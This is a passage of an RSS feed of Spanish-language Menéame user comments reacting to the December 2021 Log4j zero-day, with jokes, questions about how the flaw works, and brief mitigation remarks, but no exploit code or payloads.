		<description><![CDATA[<p><a class="tooltip c:3594248-35" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c035#c-35" rel="nofollow">#35</a> Imagina que tienes un punto de entrada a tu aplicación (suscripción a una cola, un controlador rest, un socket, etc.) y estás guardando trazas de lo que recibes por ahí para poder diagnosticar posibles problemas... No es tan raro, ¿no?</p><p>&#187;&nbsp;autor: <strong>drnth</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520041</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>38</meneame:order>
		<meneame:user>el-brujo</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>12</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#38 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c038#c-38</link>
		<pubDate>Fri, 10 Dec 2021 21:44:51 +0000</pubDate>
		<dc:creator>el-brujo</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c038#c-38</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-14" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c014#c-14" rel="nofollow">#14</a> <a href="https://isc.sans.edu/diary/28120" title="isc.sans.edu/diary/28120" rel="nofollow">isc.sans.edu/diary/28120</a></p><p>&#187;&nbsp;autor: <strong>el-brujo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519990</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>37</meneame:order>
		<meneame:user>snowdenknows</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#37 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c037#c-37</link>
		<pubDate>Fri, 10 Dec 2021 21:35:52 +0000</pubDate>
		<dc:creator>snowdenknows</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c037#c-37</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-4" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c04#c-4" rel="nofollow">#4</a> prácticamente todo lo que usa java, usa log4j, si no es la propia aplicación alguna librería que usan</p><p>&#187;&nbsp;autor: <strong>snowdenknows</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519869</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>36</meneame:order>
		<meneame:user>alpoza</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#36 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c036#c-36</link>
		<pubDate>Fri, 10 Dec 2021 21:16:32 +0000</pubDate>
		<dc:creator>alpoza</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c036#c-36</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-5" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c05#c-5" rel="nofollow">#5</a> este no falla</p><p>&#187;&nbsp;autor: <strong>alpoza</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519807</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>35</meneame:order>
		<meneame:user>--94561--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#35 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c035#c-35</link>
		<pubDate>Fri, 10 Dec 2021 21:04:40 +0000</pubDate>
		<dc:creator>--94561--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c035#c-35</guid>
		<description><![CDATA[<p>Pero a ver si lo entiendo:<br />
<br />
La vulnerabilidad es cuando logueas, directamente, el resultado de una llamada a un LDAP pq lo deserializa in java's way?<br />
<br />
Pero quien loguea eso? Por que?</p><p>&#187;&nbsp;autor: <strong>--94561--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519782</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>34</meneame:order>
		<meneame:user>Emosido_engañado</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>40</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#34 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c034#c-34</link>
		<pubDate>Fri, 10 Dec 2021 20:59:24 +0000</pubDate>
		<dc:creator>Emosido_engañado</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c034#c-34</guid>
		<description><![CDATA[<p>Una vulnerabilidad zero day, nivel 10/10 y un viernes. El hijoputismo no tiene fronteras. Ya puede arder el mundo que mañana me toco los cojones.</p><p>&#187;&nbsp;autor: <strong>Emosido_engañado</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519779</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>33</meneame:order>
		<meneame:user>Mutiko30</meneame:user>
		<meneame:votes>5</meneame:votes>
		<meneame:karma>12</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#33 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c033#c-33</link>
		<pubDate>Fri, 10 Dec 2021 20:58:53 +0000</pubDate>
		<dc:creator>Mutiko30</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c033#c-33</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-31" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c031#c-31" rel="nofollow">#31</a> no tengo ni idea.. he leído algo de apache y he asumido que era un tema de servidores <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/wink.png" alt=";)" title=";)" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>Mutiko30</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519746</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>32</meneame:order>
		<meneame:user>--419859--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>14</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#32 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c032#c-32</link>
		<pubDate>Fri, 10 Dec 2021 20:53:49 +0000</pubDate>
		<dc:creator>--419859--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c032#c-32</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-17" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c017#c-17" rel="nofollow">#17</a> ¿Que no funcioni?, ¿versiones actualizadas? <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>--419859--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519700</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>31</meneame:order>
		<meneame:user>Mschumacher</meneame:user>
		<meneame:votes>5</meneame:votes>
		<meneame:karma>49</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#31 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c031#c-31</link>
		<pubDate>Fri, 10 Dec 2021 20:43:27 +0000</pubDate>
		<dc:creator>Mschumacher</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c031#c-31</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-28" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c028#c-28" rel="nofollow">#28</a> pero que servidores? Es una librería de Java</p><p>&#187;&nbsp;autor: <strong>Mschumacher</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519672</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>30</meneame:order>
		<meneame:user>Mutiko30</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>15</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#30 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c030#c-30</link>
		<pubDate>Fri, 10 Dec 2021 20:37:31 +0000</pubDate>
		<dc:creator>Mutiko30</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c030#c-30</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-20" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c020#c-20" rel="nofollow">#20</a> ventanas, ventanas traigo.. y pingüinos, pinguinitos también traigo.</p><p>&#187;&nbsp;autor: <strong>Mutiko30</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519668</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>29</meneame:order>
		<meneame:user>omegapoint</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#29 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c029#c-29</link>
		<pubDate>Fri, 10 Dec 2021 20:37:17 +0000</pubDate>
		<dc:creator>omegapoint</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c029#c-29</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-4" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c04#c-4" rel="nofollow">#4</a> yo mismo, no dire donde, pero... mierda!</p><p>&#187;&nbsp;autor: <strong>omegapoint</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519667</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>28</meneame:order>
		<meneame:user>Mutiko30</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>2</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#28 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c028#c-28</link>
		<pubDate>Fri, 10 Dec 2021 20:37:12 +0000</pubDate>
		<dc:creator>Mutiko30</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c028#c-28</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-22" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c022#c-22" rel="nofollow">#22</a> Que a mi me la suda..  pero ni una palabra de los S.O afectados en servidores.. hay lo dejo.</p><p>&#187;&nbsp;autor: <strong>Mutiko30</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519663</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>27</meneame:order>
		<meneame:user>omegapoint</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#27 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c027#c-27</link>
		<pubDate>Fri, 10 Dec 2021 20:36:54 +0000</pubDate>
		<dc:creator>omegapoint</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c027#c-27</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-3" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c03#c-3" rel="nofollow">#3</a> ohhhh mierda mierda mierda!!!!</p><p>&#187;&nbsp;autor: <strong>omegapoint</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519659</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>26</meneame:order>
		<meneame:user>todosube</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>32</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#26 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c026#c-26</link>
		<pubDate>Fri, 10 Dec 2021 20:36:10 +0000</pubDate>
		<dc:creator>todosube</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c026#c-26</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-4" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c04#c-4" rel="nofollow">#4</a> Pues diría que es la librería para logging más utilizada en Java</p><p>&#187;&nbsp;autor: <strong>todosube</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519647</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>25</meneame:order>
		<meneame:user>Polmac</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>26</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#25 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c025#c-25</link>
		<pubDate>Fri, 10 Dec 2021 20:34:11 +0000</pubDate>
		<dc:creator>Polmac</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c025#c-25</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-17" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c017#c-17" rel="nofollow">#17</a> Con esas versiones, si lo he entendido bien, no funciona uno de los vectores de ataque; pero no es el único…</p><p>&#187;&nbsp;autor: <strong>Polmac</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519628</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>24</meneame:order>
		<meneame:user>EmuAGR</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#24 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c024#c-24</link>
		<pubDate>Fri, 10 Dec 2021 20:30:40 +0000</pubDate>
		<dc:creator>EmuAGR</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c024#c-24</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-11" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c011#c-11" rel="nofollow">#11</a> Bueno, de ahí a que todo esté parcheado...</p><p>&#187;&nbsp;autor: <strong>EmuAGR</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519580</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>23</meneame:order>
		<meneame:user>analphabet</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>21</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#23 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c023#c-23</link>
		<pubDate>Fri, 10 Dec 2021 20:20:52 +0000</pubDate>
		<dc:creator>analphabet</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c023#c-23</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-14" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c014#c-14" rel="nofollow">#14</a> en <a class="tooltip c:3594248-3" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c03#c-3" rel="nofollow">#3</a> tienes el poc<br />
<br />
Y básicamente esta imagen lo resume todo <a href="https://user-images.githubusercontent.com/45926593/145425339-47c71230-87d2-4519-8919-9c3520850f83.png" title="user-images.githubusercontent.com/45926593/145425339-47c71230-87d2-4519-8919-9c3520850f83.png" rel="nofollow">user-images.githubusercontent.com/45926593/145425339-47c71230-87d2-451</a></p><p>&#187;&nbsp;autor: <strong>analphabet</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519578</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>22</meneame:order>
		<meneame:user>zeekren</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#22 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c022#c-22</link>
		<pubDate>Fri, 10 Dec 2021 20:20:39 +0000</pubDate>
		<dc:creator>zeekren</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c022#c-22</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-15" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c015#c-15" rel="nofollow">#15</a> log4j se usa un huevo en Windows, no es por nada...</p><p>&#187;&nbsp;autor: <strong>zeekren</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519477</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>21</meneame:order>
		<meneame:user>manolito_pajotas</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>-7</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#21 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c021#c-21</link>
		<pubDate>Fri, 10 Dec 2021 20:03:44 +0000</pubDate>
		<dc:creator>manolito_pajotas</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c021#c-21</guid>
		<description><![CDATA[<p>Y seguro que es culpa de VOX</p><p>&#187;&nbsp;autor: <strong>manolito_pajotas</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519381</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>20</meneame:order>
		<meneame:user>borteixo</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>23</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#20 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c020#c-20</link>
		<pubDate>Fri, 10 Dec 2021 19:48:47 +0000</pubDate>
		<dc:creator>borteixo</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c020#c-20</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-15" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c015#c-15" rel="nofollow">#15</a> manzanas traigo</p><p>&#187;&nbsp;autor: <strong>borteixo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519357</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>19</meneame:order>
		<meneame:user>--453660--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#19 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c019#c-19</link>
		<pubDate>Fri, 10 Dec 2021 19:44:02 +0000</pubDate>
		<dc:creator>--453660--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c019#c-19</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-17" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c017#c-17" rel="nofollow">#17</a> es que eso es lo suyo, tener whitelisting en vez de blacklisting, network policies lo más restrictivas posibles y la parte pública ponerla a través de proxies que oculten las llamadas internas.</p><p>&#187;&nbsp;autor: <strong>--453660--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519355</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>18</meneame:order>
		<meneame:user>skylon</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#18 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c018#c-18</link>
		<pubDate>Fri, 10 Dec 2021 19:43:30 +0000</pubDate>
		<dc:creator>skylon</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c018#c-18</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-2" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c02#c-2" rel="nofollow">#2</a> no lo sabes tú bien</p><p>&#187;&nbsp;autor: <strong>skylon</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519310</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>17</meneame:order>
		<meneame:user>Overmind</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#17 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c017#c-17</link>
		<pubDate>Fri, 10 Dec 2021 19:35:54 +0000</pubDate>
		<dc:creator>Overmind</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c017#c-17</guid>
		<description><![CDATA[<p>Aunque es grave, es posible que finalmente el ataque no funcione en muchos servidores <br />
Parece que con un JDK algo actualizado ya no funciona (por ejemplo, para Java 8, desde la 191 ya no funcionaría).<br />
Por otra parte muchos servidores tienen las conexiones salientes capadas, por lo que ahí tampoco funcionaría el ataque.</p><p>&#187;&nbsp;autor: <strong>Overmind</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519299</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>16</meneame:order>
		<meneame:user>--453660--</meneame:user>
		<meneame:votes>18</meneame:votes>
		<meneame:karma>134</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#16 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c016#c-16</link>
		<pubDate>Fri, 10 Dec 2021 19:34:43 +0000</pubDate>
		<dc:creator>--453660--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c016#c-16</guid>
		<description><![CDATA[<p>Vaya huevos publicar una vulnerabilidad grave un viernes por la tarde. No tenían otro dia de la semana, no...</p><p>&#187;&nbsp;autor: <strong>--453660--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519289</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>15</meneame:order>
		<meneame:user>Mutiko30</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>5</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#15 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
